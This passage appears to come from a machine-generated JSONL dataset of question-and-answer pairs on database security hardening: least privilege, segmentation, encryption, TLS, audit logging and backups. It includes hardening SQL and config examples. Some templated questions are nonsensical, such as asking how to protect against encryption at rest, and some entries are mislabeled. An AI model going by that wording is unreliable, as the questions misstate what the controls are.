Least privilege contains damage from compromised credentials.\n\nCommon attack vectors include:\n- Exploiting overprivileged application accounts\n- Privilege escalation through excessive grants\n- Lateral movement via shared credentials\n- Data modification with write access", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176083Z", "updated_at": "2025-12-17T19:35:42.176083Z"} +{"id": "trtp-c809553cc4f6", "instruction": "What attacks exploit Database Principle of Least Privilege?", "output": "Attack techniques involving Database Principle of Least Privilege:\n\n- Exploiting overprivileged application accounts\n- Privilege escalation through excessive grants\n- Lateral movement via shared credentials\n- Data modification with write access\n\nDefenders can detect these attacks by:\n- Privilege audit reports\n- Permission change monitoring\n- Account activity analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176097Z", "updated_at": "2025-12-17T19:35:42.176097Z"} +{"id": "trtp-ad1c2e07c7c9", "instruction": "What indicators reveal malicious activity involving Database Principle of Least Privilege?", "output": "Methods for detecting 
Database Principle of Least Privilege attacks or anomalies:\n\n- Privilege audit reports\n- Permission change monitoring\n- Account activity analysis\n- Unused privilege identification", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176109Z", "updated_at": "2025-12-17T19:35:42.176109Z"} +{"id": "trtp-5e845b072dc5", "instruction": "What are best practices for preventing Database Principle of Least Privilege?", "output": "Security controls and preventive measures for Database Principle of Least Privilege:\n\n- Grant minimum required privileges\n- Use read-only accounts where possible\n- Separate application and admin accounts\n- Regular privilege reviews\n- Remove unused permissions\n\nOverprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. 
Least privilege contains damage from compromised credentials.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176122Z", "updated_at": "2025-12-17T19:35:42.176122Z"} +{"id": "trtp-083227b0a677", "instruction": "What is the syntax for Database Principle of Least Privilege?", "output": "Example of Database Principle of Least Privilege:\n\n```sql\n-- Create limited application account (PostgreSQL):\nCREATE USER app_readonly WITH PASSWORD 'strong_pass';\nGRANT CONNECT ON DATABASE production TO app_readonly;\nGRANT USAGE ON SCHEMA public TO app_readonly;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO app_readonly;\n\n-- Revoke unnecessary privileges:\nREVOKE ALL ON SCHEMA information_schema FROM app_readonly;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176133Z", "updated_at": "2025-12-17T19:35:42.176133Z"} +{"id": "trtp-9cfb5428038d", "instruction": "What do security professionals need to know about Database Network Segmentation?", "output": "Network segmentation isolates databases from direct internet access and limits lateral movement. 
Databases should reside in protected network segments with controlled access from application tiers only.\n\nSecurity Relevance: Internet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. Defense in depth protects data.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177915Z", "updated_at": "2025-12-17T19:35:42.177915Z"} +{"id": "trtp-2aea73b7f6e1", "instruction": "What are the key components of Database Network Segmentation?", "output": "Database Network Segmentation consists of the following key components:\n\n- Database network segments/VLANs\n- Firewall rules\n- Application tier access only\n- Management network separation\n- Network access control lists", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177936Z", "updated_at": "2025-12-17T19:35:42.177936Z"} +{"id": "trtp-154a719b6cff", "instruction": "Why is Database Network Segmentation important for database security?", "output": "Internet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. 
Defense in depth protects data.\n\nCommon attack vectors include:\n- Direct internet exploitation of exposed DB\n- Lateral movement from compromised web server\n- Database scanning from DMZ\n- Unauthorized management access", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177950Z", "updated_at": "2025-12-17T19:35:42.177950Z"} +{"id": "trtp-a760e92a8cac", "instruction": "What are common attack techniques involving Database Network Segmentation?", "output": "Attack techniques involving Database Network Segmentation:\n\n- Direct internet exploitation of exposed DB\n- Lateral movement from compromised web server\n- Database scanning from DMZ\n- Unauthorized management access\n\nDefenders can detect these attacks by:\n- Network traffic analysis\n- Unauthorized connection attempts\n- Port scanning indicators", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177964Z", "updated_at": "2025-12-17T19:35:42.177964Z"} +{"id": "trtp-0afdf45ad005", "instruction": "How can security teams detect attacks related to Database Network Segmentation?", "output": "Methods for detecting Database Network Segmentation attacks or anomalies:\n\n- Network traffic analysis\n- 
Unauthorized connection attempts\n- Port scanning indicators\n- Cross-segment access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177975Z", "updated_at": "2025-12-17T19:35:42.177975Z"} +{"id": "trtp-7eea439f9699", "instruction": "What are best practices for preventing Database Network Segmentation?", "output": "Security controls and preventive measures for Database Network Segmentation:\n\n- Place databases in isolated segments\n- Firewall rules allowing only app tier\n- Bind to internal interfaces only\n- Separate management network\n- Regular network architecture review\n\nInternet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. 
Defense in depth protects data.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177988Z", "updated_at": "2025-12-17T19:35:42.177988Z"} +{"id": "trtp-ead09c4f3648", "instruction": "What does Database Network Segmentation look like in SQL?", "output": "Example of Database Network Segmentation:\n\n```sql\n# Firewall rules for database tier:\n# Allow from app servers only\niptables -A INPUT -p tcp -s 10.0.1.0/24 --dport 5432 -j ACCEPT\niptables -A INPUT -p tcp --dport 5432 -j DROP\n\n# PostgreSQL: bind to internal interface only\nlisten_addresses = '10.0.2.10'\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177998Z", "updated_at": "2025-12-17T19:35:42.177998Z"} +{"id": "trtp-7d7c23cf762c", "instruction": "What do security professionals need to know about Database Encryption at Rest?", "output": "Encryption at rest protects database files from unauthorized access through filesystem or physical media theft. Transparent Data Encryption (TDE), file-level encryption, and full disk encryption provide different protection levels.\n\nSecurity Relevance: Data at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. 
Without encryption, database files can be read directly, bypassing authentication.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179880Z", "updated_at": "2025-12-17T19:35:42.179880Z"} +{"id": "trtp-ce922c7976e3", "instruction": "What are the key components of Database Encryption at Rest?", "output": "Database Encryption at Rest consists of the following key components:\n\n- Transparent Data Encryption (TDE)\n- Column-level encryption\n- File-system encryption\n- Full disk encryption\n- Key management", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179900Z", "updated_at": "2025-12-17T19:35:42.179900Z"} +{"id": "trtp-aa2ee779d478", "instruction": "From a security perspective, why should defenders understand Database Encryption at Rest?", "output": "Data at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. 
Without encryption, database files can be read directly, bypassing authentication.\n\nCommon attack vectors include:\n- Database file theft and direct reading\n- Backup media theft\n- Decommissioned hardware analysis\n- Cloud storage bucket exposure", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179916Z", "updated_at": "2025-12-17T19:35:42.179916Z"} +{"id": "trtp-538cafc371bc", "instruction": "How do attackers abuse Database Encryption at Rest?", "output": "Attack techniques involving Database Encryption at Rest:\n\n- Database file theft and direct reading\n- Backup media theft\n- Decommissioned hardware analysis\n- Cloud storage bucket exposure\n\nDefenders can detect these attacks by:\n- Encryption status monitoring\n- Key access auditing\n- Unauthorized file access attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179930Z", "updated_at": "2025-12-17T19:35:42.179930Z"} +{"id": "trtp-036cca879eda", "instruction": "What should analysts look for when monitoring for Database Encryption at Rest?", "output": "Methods for detecting Database Encryption at Rest attacks or anomalies:\n\n- Encryption status monitoring\n- Key access auditing\n- Unauthorized 
file access attempts\n- Backup encryption verification", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179941Z", "updated_at": "2025-12-17T19:35:42.179941Z"} +{"id": "trtp-8c9ab2cbbfc8", "instruction": "How can organizations protect against Database Encryption at Rest?", "output": "Security controls and preventive measures for Database Encryption at Rest:\n\n- Enable TDE for databases\n- Encrypt sensitive columns additionally\n- Secure key management\n- Encrypt backups separately\n- Verify encryption on all environments\n\nData at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. 
Without encryption, database files can be read directly, bypassing authentication.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179953Z", "updated_at": "2025-12-17T19:35:42.179953Z"} +{"id": "trtp-4890394a8303", "instruction": "What is the syntax for Database Encryption at Rest?", "output": "Example of Database Encryption at Rest:\n\n```sql\n-- SQL Server TDE:\nUSE master;\nCREATE MASTER KEY ENCRYPTION BY PASSWORD = 'StrongPassword!';\nCREATE CERTIFICATE TDECert WITH SUBJECT = 'TDE Certificate';\nUSE production;\nCREATE DATABASE ENCRYPTION KEY WITH ALGORITHM = AES_256\n ENCRYPTION BY SERVER CERTIFICATE TDECert;\nALTER DATABASE production SET ENCRYPTION ON;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179964Z", "updated_at": "2025-12-17T19:35:42.179964Z"} +{"id": "trtp-3f16da287a7c", "instruction": "What do security professionals need to know about Database Connection Encryption (TLS)?", "output": "TLS encrypts database connections, preventing credential interception and data eavesdropping. 
All database connections should require TLS, especially across networks and from application servers.\n\nSecurity Relevance: Unencrypted database connections expose credentials and data to network interception. Man-in-the-middle attacks can modify queries and results. TLS is essential for network security.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181688Z", "updated_at": "2025-12-17T19:35:42.181688Z"} +{"id": "trtp-c5c7fbb05050", "instruction": "What are the key components of Database Connection Encryption (TLS)?", "output": "Database Connection Encryption (TLS) consists of the following key components:\n\n- TLS certificate configuration\n- Client certificate authentication\n- Cipher suite selection\n- Certificate validation\n- Protocol version enforcement", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181709Z", "updated_at": "2025-12-17T19:35:42.181709Z"} +{"id": "trtp-c9b74d086d23", "instruction": "What security risks are associated with Database Connection Encryption (TLS)?", "output": "Unencrypted database connections expose credentials and data to network interception. 
Man-in-the-middle attacks can modify queries and results. TLS is essential for network security.\n\nCommon attack vectors include:\n- Credential sniffing on network\n- Man-in-the-middle query injection\n- Data interception\n- Downgrade attacks", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181724Z", "updated_at": "2025-12-17T19:35:42.181724Z"} +{"id": "trtp-c0bef782c80d", "instruction": "What attacks exploit Database Connection Encryption (TLS)?", "output": "Attack techniques involving Database Connection Encryption (TLS):\n\n- Credential sniffing on network\n- Man-in-the-middle query injection\n- Data interception\n- Downgrade attacks\n\nDefenders can detect these attacks by:\n- Unencrypted connection attempts\n- Certificate validation failures\n- TLS version monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181738Z", "updated_at": "2025-12-17T19:35:42.181738Z"} +{"id": "trtp-806e346a2c6f", "instruction": "What should analysts look for when monitoring for Database Connection Encryption (TLS)?", "output": "Methods for detecting Database Connection Encryption (TLS) attacks or anomalies:\n\n- Unencrypted connection attempts\n- 
Certificate validation failures\n- TLS version monitoring\n- Network traffic analysis", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181749Z", "updated_at": "2025-12-17T19:35:42.181749Z"} +{"id": "trtp-65952a4c3c77", "instruction": "How can organizations protect against Database Connection Encryption (TLS)?", "output": "Security controls and preventive measures for Database Connection Encryption (TLS):\n\n- Require TLS for all connections\n- Use TLS 1.2 or higher\n- Proper certificate management\n- Client certificate authentication where feasible\n- Regular cipher suite review\n\nUnencrypted database connections expose credentials and data to network interception. Man-in-the-middle attacks can modify queries and results. 
TLS is essential for network security.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181762Z", "updated_at": "2025-12-17T19:35:42.181762Z"} +{"id": "trtp-536b7e526bc3", "instruction": "Provide a code example for Database Connection Encryption (TLS).", "output": "Example of Database Connection Encryption (TLS):\n\n```sql\n# PostgreSQL TLS configuration (postgresql.conf):\nssl = on\nssl_cert_file = 'server.crt'\nssl_key_file = 'server.key'\nssl_ca_file = 'ca.crt'\nssl_min_protocol_version = 'TLSv1.2'\n\n# Force TLS in pg_hba.conf:\nhostssl all all 0.0.0.0/0 scram-sha-256\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181773Z", "updated_at": "2025-12-17T19:35:42.181773Z"} +{"id": "trtp-461f45b58e87", "instruction": "Explain Database Audit Logging from a security perspective.", "output": "Audit logging records database activities for security monitoring, incident response, and compliance. Comprehensive logging captures authentication, authorization, data access, and administrative operations.\n\nSecurity Relevance: Audit logs enable detection of attacks, investigation of incidents, and compliance verification. 
Without logging, breaches go undetected and investigations lack evidence. Log protection prevents tampering.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183486Z", "updated_at": "2025-12-17T19:35:42.183486Z"} +{"id": "trtp-206be0e690cc", "instruction": "What elements make up Database Audit Logging?", "output": "Database Audit Logging consists of the following key components:\n\n- Authentication event logging\n- Query/statement logging\n- DDL operation logging\n- Privilege change logging\n- Log protection and retention", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183506Z", "updated_at": "2025-12-17T19:35:42.183506Z"} +{"id": "trtp-2fdb2672806c", "instruction": "Why is Database Audit Logging important for database security?", "output": "Audit logs enable detection of attacks, investigation of incidents, and compliance verification. Without logging, breaches go undetected and investigations lack evidence. 
Log protection prevents tampering.\n\nCommon attack vectors include:\n- Attacks going undetected without logging\n- Audit log tampering\n- Log file deletion\n- Overwhelming logs to hide activity", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183521Z", "updated_at": "2025-12-17T19:35:42.183521Z"} +{"id": "trtp-69c65fd1093a", "instruction": "What threats are associated with Database Audit Logging?", "output": "Attack techniques involving Database Audit Logging:\n\n- Attacks going undetected without logging\n- Audit log tampering\n- Log file deletion\n- Overwhelming logs to hide activity\n\nDefenders can detect these attacks by:\n- Log analysis for suspicious patterns\n- Authentication failure monitoring\n- Privilege change alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183535Z", "updated_at": "2025-12-17T19:35:42.183535Z"} +{"id": "trtp-a2ce84f11818", "instruction": "How do you detect exploitation of Database Audit Logging?", "output": "Methods for detecting Database Audit Logging attacks or anomalies:\n\n- Log analysis for suspicious patterns\n- Authentication failure monitoring\n- Privilege change alerts\n- Anomalous query patterns", "category": "detection", 
"team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183547Z", "updated_at": "2025-12-17T19:35:42.183547Z"} +{"id": "trtp-aa5edd0e8612", "instruction": "What security controls mitigate Database Audit Logging risks?", "output": "Security controls and preventive measures for Database Audit Logging:\n\n- Enable comprehensive audit logging\n- Ship logs to SIEM/central logging\n- Protect log integrity\n- Define retention policies\n- Regular log review\n\nAudit logs enable detection of attacks, investigation of incidents, and compliance verification. Without logging, breaches go undetected and investigations lack evidence. Log protection prevents tampering.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183559Z", "updated_at": "2025-12-17T19:35:42.183559Z"} +{"id": "trtp-55668f3a4bcb", "instruction": "What is the syntax for Database Audit Logging?", "output": "Example of Database Audit Logging:\n\n```sql\n-- PostgreSQL audit logging:\n-- postgresql.conf:\nlog_connections = on\nlog_disconnections = on\nlog_statement = 'ddl'\nlog_line_prefix = '%t [%p]: user=%u,db=%d,app=%a,client=%h '\n\n-- pgaudit extension for detailed auditing:\nCREATE EXTENSION pgaudit;\nSET pgaudit.log = 'read, write, ddl';\n```", "category": 
"database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183570Z", "updated_at": "2025-12-17T19:35:42.183570Z"} +{"id": "trtp-2ca518676165", "instruction": "What is Database Backup Security and why is it important for database security?", "output": "Database backups contain all the sensitive data of the production database. Backup security includes encryption, access control, testing, and secure storage. Compromised backups enable complete data theft.\n\nSecurity Relevance: Backups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. 
Unencrypted backups on shared storage are common vulnerabilities.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185404Z", "updated_at": "2025-12-17T19:35:42.185404Z"} +{"id": "trtp-c9b38ab14d2e", "instruction": "Describe the technical aspects of Database Backup Security.", "output": "Database Backup Security consists of the following key components:\n\n- Backup encryption\n- Backup storage security\n- Access control for backups\n- Backup testing and verification\n- Retention and destruction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185424Z", "updated_at": "2025-12-17T19:35:42.185424Z"} +{"id": "trtp-239fc071b868", "instruction": "What security risks are associated with Database Backup Security?", "output": "Backups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. 
Unencrypted backups on shared storage are common vulnerabilities.\n\nCommon attack vectors include:\n- Backup file theft\n- Cloud storage bucket misconfiguration\n- Backup media theft\n- Ransomware targeting backups", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185438Z", "updated_at": "2025-12-17T19:35:42.185438Z"} +{"id": "trtp-c4effa940fdc", "instruction": "What are common attack techniques involving Database Backup Security?", "output": "Attack techniques involving Database Backup Security:\n\n- Backup file theft\n- Cloud storage bucket misconfiguration\n- Backup media theft\n- Ransomware targeting backups\n\nDefenders can detect these attacks by:\n- Backup access monitoring\n- Backup integrity verification\n- Unauthorized backup access attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185452Z", "updated_at": "2025-12-17T19:35:42.185452Z"} +{"id": "trtp-70e6067dcd8f", "instruction": "What log entries indicate Database Backup Security attacks?", "output": "Methods for detecting Database Backup Security attacks or anomalies:\n\n- Backup access monitoring\n- Backup integrity verification\n- Unauthorized backup access attempts\n- Backup storage security 
scanning", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185463Z", "updated_at": "2025-12-17T19:35:42.185463Z"} +{"id": "trtp-2046c1fb2183", "instruction": "How can organizations protect against Database Backup Security?", "output": "Security controls and preventive measures for Database Backup Security:\n\n- Encrypt all backups\n- Secure backup storage access\n- Test backup restoration regularly\n- Implement backup retention policies\n- Offline/immutable backup copies\n\nBackups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. 
